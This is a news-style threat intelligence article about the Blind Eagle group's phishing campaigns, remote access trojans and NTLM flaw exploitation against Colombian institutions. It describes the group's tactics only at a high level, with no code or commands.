Blind Eagle, a notorious threat actor operating since at least 2018, is leveraging NTLM flaws to launch sophisticated cyber attacks against Colombian institutions, creating unprecedented challenges for these entities. Also known as AguilaCiega, APT-C-36, and APT-Q-98, this cybercriminal group has focused its efforts on South American countries, primarily Colombia and Ecuador. The group’s campaigns have been monitored closely since November 2024, with a significant infection rate, particularly targeting Colombian judicial institutions and other governmental or private organizations. One particular campaign, around December 19, 2024, resulted in over 1,600 victims, highlighting the effectiveness of Blind Eagle’s malicious operations.
Attack Methods and Tools Used by Blind Eagle
Blind Eagle’s attack methodologies are sophisticated and multifaceted, relying heavily on spear-phishing emails to gain initial access to their targets. These emails often carry payloads designed to deploy remote access trojans (RATs) such as AsyncRAT, NjRAT, Quasar RAT, and Remcos RAT. The attackers have also showcased their technical prowess by exploiting a variant of a now-patched Microsoft Windows vulnerability (CVE-2024-43451). This NTLMv2 hash disclosure vulnerability allows Blind Eagle to detect when a malicious .URL is downloaded and executed, even on systems that have been patched against the flaw. Their rapid adaptation to security patches demonstrates their capacity to stay ahead of conventional defense mechanisms.
Moreover, Blind Eagle utilizes packer-as-a-service (PaaS) tools like HeartCrypt, which help them obfuscate their malicious code and evade detection. By distributing their payloads via platforms such as Bitbucket and GitHub, they manage to bypass traditional security measures. This tactic signifies a shift from more conventional platforms like Google Drive and Dropbox, highlighting their ability to evolve and adapt their strategies. Such means not only make their attacks harder to detect but also enable them to maintain persistent access within the compromised networks.
Data Compromise and Operational Insights
Blind Eagle’s ability to compromise data effectively is evident from an analysis of a GitHub repository they utilized during their campaigns. This repository revealed a lot about their operational tactics, including clues that align their activities with the UTC-5 time zone, corresponding to South American regions. Within this repository were sensitive details, such as account-password pairs for 1,634 unique email addresses, providing significant insights into the breadth of their compromise. The data unearthed included usernames, passwords, email credentials, and even ATM PINs, closely tying the incidents to various Colombian entities.
These operational slip-ups, while rare, exposed critical information about Blind Eagle’s infiltration techniques. The strategic use of legitimate file-sharing platforms such as Google Drive, Dropbox, Bitbucket, and GitHub for malware deployment allows Blind Eagle to blend in seamlessly with everyday network traffic. By leveraging these widespread services, they effectively bypass conventional cybersecurity defenses and remain undetected for extended periods. Their use of advanced crimeware tools like Remcos RAT, HeartCrypt, and PureCrypter points to deep connections within the cybercriminal ecosystem, which provides them with cutting-edge evasion strategies and long-term access to compromised networks.
Strategic Implications and Future Considerations
Blind Eagle, also known as AguilaCiega, APT-C-36, and APT-Q-98, has been an active threat actor since at least 2018. This cybercriminal group targets flaws in NTLM to execute sophisticated cyber attacks, posing major challenges for Colombian institutions. Their malicious efforts extend primarily to South American nations, particularly Colombia and Ecuador. Since November 2024, Blind Eagle’s campaigns have been under close watch, revealing a substantial infection rate affecting Colombian judicial bodies and other governmental or private sectors. One notable campaign around December 19, 2024, affected over 1,600 victims, showcasing the group’s effective and harmful operations. The group’s advanced tactics and targeted approach pose a significant risk, and authorities are continuously striving to combat the cyber threats posed by Blind Eagle. The impact of these attacks has been profound, highlighting the need for enhanced cyber defense measures in the region to protect against such persistent threats.